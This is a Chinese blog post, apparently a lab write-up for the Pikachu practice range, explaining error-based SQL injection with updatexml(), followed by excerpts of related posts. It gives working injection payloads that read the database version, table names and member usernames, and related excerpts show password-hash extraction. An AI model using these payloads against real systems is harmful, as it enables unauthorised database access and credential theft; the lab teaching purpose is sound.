Pikachu SQL基于函数的报错提示利用

最新推荐文章于 2024-10-05 00:24:42 发布
最新推荐文章于 2024-10-05 00:24:42 发布
阅读量164 收藏
点赞数
文章标签: SQL注入 updatexml函数 信息获取 数据库安全 攻击防范
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63152656/article/details/127028154
版权

先写一下数据库的指令:

        kobe' and updatexml(1,concat(0x7e,version()),0)#

这与之前发布的文章里类似,这里利用函数报错的信息

updatexml()是一个专门报错的函数 ,里面会加入一些正常的语句来获取信息

获取到版本号

 

 写长点的语句

kobe' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 1,1)),0)#

information_schema.tables:

        详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。

select table_name

        查询的表名

 

以上可以获取到表名和字段名等等,只要变换里面的名字 

新一段数据库指令(获取用户名,同理可以获取密码)

        kobe' and updatexml(1,concat(0x7e,(select username from member   limit 1,1)),0)#

 

hts0336
关注
pikachu靶场-4 SQL注入漏洞
weixin_52180702的博客
12-12 2264
既然在页面上只能判断真假,那么这个时候我们就可以对数据库里面的结果去按照刚才的方法去截取一个字符,转换成ASCII码然后去进行比较,只不过这个方式会很麻烦,因为盲注这种情况你没法通过页面上的返回来直接拿数据,你只能通过这种猜测的方式(真或者假)去一步一步猜测后面的数据,所以盲注如果要手工利用的话会非常的麻烦,非常的耗时间,我们在搞懂盲注原理的情况下,可以使用工具去进行自动化的测试。那就需要结合我们的经验和我们的想象了,多去做一些payload的测试,根据返回结果来判断我们是否打中了。
7.1.SQL注入-基于函数报错的方式来利用updatexml()
愿听风成曲
07-02 627
函数concat()意思为:括号里面的字符串进行拼接,为了将报错显示全面。limit 0,1 意思为:第一个数据为第几个,第二数字为显示多少行。第二个参数,意思就是定位到xml文档中指定的某一个位置的更新。第三个参数,意思就是将文档中指定某一个位置的内容进行替换。基于函数报错的payload语句:updatexml()获取密码md5值,可以解析出来密码为:123456。可以使用limit一次一次进行获取表名。第一个参数,意思就是xml文档的名称。获取表名之后,在获取列名,思路一致。
Sql-Inject基于函数报错的信息获取
qq_45680080的博客
11-02 295
Sql-Inject漏洞手动测试-基于函数报错的信息获取 Sq|-Inject漏洞手动测试基于函数报错的信息获取 ●常用的报错函数updatexml0、extractvalue0. floor0 该三个函数可通过对应的报错信息去获取需要的内容。 ●基于函数报错的信息获(select/insert/update/delete ) 基于报错的信息获取 技巧思路: 在MYSQL中使用一些指定的函数来制造...
SQL注入之——基于函数报错手工注入(insert update delete)
温柔小薛的博客
04-02 1555
基于函数报错手工注入(insert update delete) 目录基于函数报错手工注入(insert update delete)基于函数报错注入常见攻击方法技巧思路背景条件基于报错的信息获取(三个常用的用来报错函数)实战测试insert注入(注册信息使用函数)update注入(用于用户登陆端修改用户信息)delet注入(删除相关)遇到的问题 基于函数报错注入 常见攻击方法 updata...
SQL注入报错注入函数
热门推荐
lightsec
03-15 1万+
前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用报错函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
SQL注入-报错注入
LJH1999ZN的博客
02-09 1万+
sql注入之报错注入的演示与介绍
基于函数报错sql漏洞查询
weixin_44720762的博客
04-07 290
基于报错的信息获取 简单介绍函数updatexml(): updatexml(xml_document,xpath_string,new_value): 其中第一个参数的document为文件名;第二个参数前面的xpath是xml中查询语言(至于更详细的xpath语法,读者可以自行百度),简单来说就是对第一个参数中的文件进行定位的,string代表格式;第三个参数表示重新定义查找到的数据,也就是说...
pikachu】漏洞之基于报错函数注入
weixin_43526443的博客
03-19 710
前提了解 1.分析        注册、修改及删除,对应数据库使用insert/updae/delete方式处理;内置sql语句前段非select,故不可使用union联合查询, 而可使用基于函数报错信息获取;       条件:页面可以显示数据库语法报错信息 2.常用...
SQL注入之基于函数报错
qq_53318766的博客
12-20 152
Kobe’ and updatexml(1,concat(0x7e,(select password from users where username=’admin’ limit 0,1)),0)#,获取到了加密的密文。进行改进:kobe’ and updatexml(1,concat(0x7e,version()),0)#,concat是将括号里面的数据进行连接。Kobe’ and updatexml(1,version(),0)#,中间的值也可以是表达式,那么就会先执行表达式的值,再返回到报错信息。
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
3. **基于报错SQL盲注**:通过让数据库产生错误并观察错误信息来获取数据,例如使用`floor`、`updatexml`或`extractvalue`函数。攻击者可以构造特定的SQL语句,使数据库在处理时出错,从而揭示部分信息。 **示例...
sql-inject漏洞手动测试-基于函数报错的信息获取
北冥有鱼
03-31 318
1.常用的报错函数: updatexml() extractvalue() floor() 我们在使用这三个函数的时候,可以根据我们构造的报错点,把相关的报错信息给报出来,我们就可以通过相关的报错信息,来把我们想要的信息给套出来 2.基于函数报错的信息获取(select/insert/update/delete) 前面的几次注入我们一直都用的select,这次我们可以使用insert,updat...
SQL注入--报错和盲注
qq_57307348的博客
02-10 1937
回顾之前的文章(sql注入基础),了解到sql注入的分类有 基于正常回显 联合查询 union select 基于错误回显 floor() extractvalue()   updatexml() 盲注 布尔型盲注 基于时间盲注sleep() 报错注入的前提 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点: 不需要显示位 缺点: 需要输出mysql_error()的...
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 5254
Pikachu靶场–Sql
【ecology】独立选择框\公共选择框表
fwecology的博客
09-30 327
ecology独立选择框公共选择框表
PostgreSQL 创建账号与数据库:从连接到权限配置的完整指南
敲代码别忘了喝上一杯凉白开。
10-04 666
本文详细讲解了如何在 PostgreSQL 数据库中创建账号和数据库,并为该账号配置相关权限的完整过程。通过使用 psql 连接数据库,创建用户和数据库,以及授予数据库访问权限,用户可以轻松完成 PostgreSQL 的账号和数据库管理。文章还介绍了如何使用新账号登录数据库并运行 SQL 文件进行数据操作,提供了从连接、创建、授权到执行 SQL 的一站式操作指南,适用于数据库初学者和管理员。
实用SQL小总结
UntifA的博客
09-29 1513
SQL记录
掌握嵌套子查询:复杂 SQL 中 * 列的准确表列关系
最新发布
学习之余随便记记
10-05 843
本文重点讨论在具有 * 列的嵌套子查询中建立表和列之间正确关系的挑战。使用 Teradata SQL 代码示例来说明该过程。本文聚焦于一个别名为 SUBSCRIBER_ 的子查询及其派生的列,这些列在外层查询中被使用。有些列在子查询的选择列表中被明确列出,而其他一些列则来自一个列(SUBSCR.),这个*列引用了 PRD2_ODW.SUBSCRIBER_ 表。接着,分析检查了外层查询的选择列表,特别是来自 SUBSCRIBER_ 子查询的列。
PostgreSQL 字段使用pglz压缩测试
文牧之的博客
09-30 648
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
pikachu靶场sql注入报错
09-02
对于Pikachu靶场的SQL注入报错问题,可以尝试以下步骤进行排查和解决: 1. 检查注入点:首先确认注入点在哪里,可以通过浏览器开发者工具查看请求,找到可能存在注入的参数或者输入框。 2. 过滤特殊字符:确保用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值